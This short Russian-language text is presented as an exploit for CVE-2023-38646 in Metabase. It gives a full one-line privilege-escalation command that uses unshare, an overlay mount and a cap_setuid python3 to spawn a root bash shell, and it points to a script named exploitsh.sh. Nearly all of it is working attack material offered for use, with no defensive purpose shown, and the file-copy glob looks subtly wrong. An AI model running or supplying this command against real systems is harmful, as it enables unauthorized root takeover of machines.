
Эксплойт для CVE-2023-38646 в Metabase, обеспечивающий удалённое выполнение кода и повышение привилегий до root с помощью техник unshare и setuid.
Чтобы получить root-доступ к машине или системе в соответствии с приведённой выше информацией, эта команда и файл предоставят доступ к root-пользователю.
Вы можете выполнить эту команду напрямую или запустить как файл и выполнить. Команда: $unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'
Выполняемый файл: $./exploitsh.sh
Ура!